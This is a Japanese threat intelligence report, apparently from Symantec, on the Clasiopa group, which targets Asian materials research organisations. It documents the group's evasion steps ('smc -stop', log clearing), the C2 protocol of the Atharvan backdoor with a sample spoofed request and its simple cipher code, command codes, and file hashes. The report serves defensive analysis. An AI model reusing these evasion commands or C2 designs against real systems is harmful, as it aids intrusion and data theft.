Clasiopa: 材料研究機関を標的とする新たなグループ
独特なツールセットを使用しているが正体を示す手がかりはほとんどない
これまで知られていなかった攻撃グループが、アジアの材料研究機関を標的としていることが確認されました。シマンテックがClasiopaと名付けたこのグループは、独自のマルウェア(Backdoor.Atharvan)の内の1つを含む、独特のツールセットを特徴としています。現在のところ、Clasiopaの本拠地や背後関係に関する確かな証拠は見つかっていません。
Clasiopaの戦術、手法、手順(TTP)
Clasiopaの感染経路は判明していませんが、攻撃者が公開サーバーへの総当たり攻撃によってアクセスすることを示唆する証拠がいくつかあります。
使用された独特のツールセット以外にも、以下のような攻撃の特徴が観測されました。
- 攻撃者は、https://ifconfig.me/ipを使用して、攻撃対象のコンピュータのIPアドレスをチェックしていました。
- SepMasterServiceを停止させてSymantec Endpoint Protection(SEC)を無効にしようとする試みが実行されました。このクエリの結果がチェックされた後、SEPを無効にする第2の試みが「smc -stop」を使って実行されました。SEPを停止させようとするコマンドが機能するのは、攻撃者が管理者資格情報を持っていて、SEP管理者が改ざん防止保護を無効にしている場合だけです。
- 攻撃者は複数のバックドアを利用してファイル名のリスト作成及び抽出しました。これらのリストは、Thumb.dbファイルまたはZipアーカイブとして抽出されました。
- システムログがwsmprovhostを使ってクリアされました。
- すべてのイベントログがPowerShellを使ってクリアされました。
- ファイル名のリストを作成するために、「network service」という名前のスケジュールされたタスクが作成されました。
攻撃者が2つの正規のソフトウェアパッケージを使用したことを示唆するいくつかの証拠があります。侵害されたコンピュータの1台では、Jiangsu社が開発したAgile DGSサーバーとAgile FDサーバーが実行されていました。これらのパッケージは、転送中のドキュメントのセキュリティと保護のために使用されます。悪意のあるファイルが「dgs」という名前のフォルダにドロップされ、利用されたバックドアの1つはatharvan.exeからagile_update.exeに名前が変更されていました。攻撃者がこれらのソフトウェアパッケージをコピーしているのか、それともインストールしているのかは不明です。
侵害されたマシンでは、バックドアの実行とほぼ同時にHCL Domino(旧IBM Domino)も実行されていましたが、それが偶然なのかどうかは不明です。ただし、DominoもAgileソフトウェアも古い証明書を使用しているようであり、Agileサーバーは古い脆弱なライブラリを使用しています。
使用されたツール
- Atharvan: 独自に開発されたリモートアクセス型のトロイの木馬(RAT)。
- Lilith: 攻撃者は、一般に公開されているLilith RATの修正版を使用していました。この修正版は、以下のタスクを実行することができました。
- プロセスの強制終了
- プロセスの再起動
- スリープ間隔の変更
- RATのアンインストール
- リモートコマンドまたはPowerShellスクリプトの実行
- プロセスの終了
- Thumbsender: コマンドアンドコントロール(C&C)サーバーからコマンドを受信して、コンピュータ内のファイルの名前のリストを作成してThumb.dbというファイルに保存し、それらのリストを指定されたIPアドレスに送信するハッキングツールです。
- カスタムプロキシツール。
Atharvan
Atharvanは、マルウェアの実行時に「SAPTARISHI-ATHARVAN-101」という名前のミューテックスを作成し、1つのコピーしか実行されないようにするため、この名前が付けられています。
Atharvanはその後、ハードコードされたC&Cサーバーにアクセスします。現在までに分析されたサンプルの1つで見られたハードコードされたC&Cアドレスは、Amazon AWS韓国(ソウル)リージョンのものでしたが、これはC&Cインフラストラクチャの場所としては一般的ではありません。
このC&C通信はHTTP POST要求の形をとっていますが、そのHostヘッダーは「update.microsoft.com」としてハードコードされています。以下に例を示します。
POST /update.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52
Host: update.microsoft.com
Content-type: application/x-www-form-urlencoded
Content-length: 46
id=Atharvan&code=101&cid=H^[REDACTED]&time=5
この要求の本体には以下のパラメータが含まれています。
- id: ハードコードされた文字列「Atharvan」
- code: 要求の目的を示します。以下のいずれかの値をとります。
- 101: コマンドを取得する
- 102: コマンド出力やエラーメッセージを送信する
- 103: コマンド0x12を処理する場合に、書き込むファイルの本体を取得する
- cid: ハードコードされた文字列「H^」の後に、影響を受けるコンピュータのネットワークインターフェースハードウェアのアドレス(12桁の16進数)が続きます。
- time: 通信を試行する間隔
- msg(オプション): codeパラメータで指定された要求の目的に応じて、以下のいずれかになります。
- codeパラメータが102の場合、コマンドの出力かエラーメッセージが暗号化されてmsgに格納されます。
- codeパラメータが103の場合、暗号化なしで取得するファイルを特定します。
このマルウェアでは、msgパラメータの値の暗号化に以下の暗号化アルゴリズムが使用されます。
def encrypt(plaintext):
return bytes([((2 - byte) & 0xff) for byte in plaintext])
このマルウェアは、独自の単純なHTTP解析機能を使用して、サーバーの応答から本体を抽出します。抽出された本体は、以下のアルゴリズムを使用して復号化されます。
def decrypt(ciphertext):
return bytes([((2 - byte) & 0xff) for byte in ciphertext])
コマンドを取得する際、マルウェアは復号化された本体に「\x1A」文字で区切られた一連の文字列が含まれていることを期待します。
各文字列の先頭のバイトは実行するコマンドを指定し、残りのバイトはコマンドパラメータとして解釈されます。
| コマンド | 説明 |
|---|---|
| 0x11 | 通信を試行する間隔を設定する |
| 0x12 | 指定されたコントロールサーバーから任意のファイルをダウンロードする |
| 0x15 | 任意の実行ファイルを実行し、その出力をリモートの攻撃者に送信する |
| 0x16 | スケジュールタイプ0x16を使用するように通信を設定する |
| 0x17 | スケジュールタイプ0x17を使用するように通信を設定する |
| 0x18 | スケジュールタイプ0x18を使用するように通信を設定する |
通信スケジュールを設定する場合、コマンドパラメータは通信を試行する時刻と日付を指定します。複数の異なる時間を指定することができ、その日の時間と分はエンコードされています。
日付は以下のように解釈されます。
- 制限なし(通信スケジュールタイプ0x16)
- 日付を指定するビットマスク(通信スケジュールタイプ0x17)
- 曜日を指定するビットマスク(通信スケジュールタイプ0x18)
このスケジュール通信の設定も本マルウェアの珍しい特徴であり、この種のマルウェアではあまり見られないものです。
正体の特定
Clasiopaの本拠地や動機を示す確かな証拠は、今のところ見つかっていません。Atharvanバックドアでは、ヒンディー語のミューテックス「SAPTARISHI-ATHARVAN-101」が使用されています。Atharvan(アタルヴァン)は、ヒンズー教の伝説的なヴェーダの賢人です。また、このバックドアはC&CサーバーへのPOST要求で以下の引数を使用します。
- d=%s&code=%d&cid=%s&time=%dtharvan
さらに、攻撃者がZIPアーカイブに使用したパスワードの1つは「iloveindea1998^_^」でした。
これらの詳細はグループの本拠地がインドであることを示唆している可能性もありますが、特にパスワードがヒントとしてあからさま過ぎるため、この情報が偽のフラグとして埋め込まれた可能性の方が高いと思われます。
保護/緩和
Symantec Protection Bulletinで保護に関する最新情報をご確認ください。
侵害の痕跡
IOCが悪意のあるもので、シマンテックが入手できるファイルであれば、Symantec Endpoint製品はそのファイルを検知し、ブロックします。
5b74b2176b8914b0c4e6215baab9e96d1e9a773803105cf50dac0427fac79c1b – Backdoor.Atharvan
8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b – Backdoor.Atharvan
95f76a95adcfdd91cb626278006c164dcc46009f61f706426b135cdcfa9598e3 – Lilith
940ab006769745b19de5e927d344c4a4f29cae08e716ee0b77115f5f2a2e3328 – Lilith
38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07 – Lilith
c94c42177d4f9385b02684777a059660ea36ce6b070c2dba367bf8da484ee275 – Thumbsender
f93ddb2377e02b0673aac6d540a558f9e47e611ab6e345a39fd9b1ba9f37cd22 – カスタムプロキシツール
3aae54592fe902be0ca1ab29afe5980be3f96888230d5842e93b3ca230f8d18d – バックドア
0550e1731a6aa2546683617bd33311326e7b511a52968d24648ea231da55b7e5 – バックドア
8023b2c1ad92e6c5fec308cfafae3710a5c47b1e3a732257b69c0acf37cb435b – ハッキングツール
1569074db4680a9da6687fb79d33160a72d1e20f605e661cc679eaa7ab96a2cd – ハッキングツール
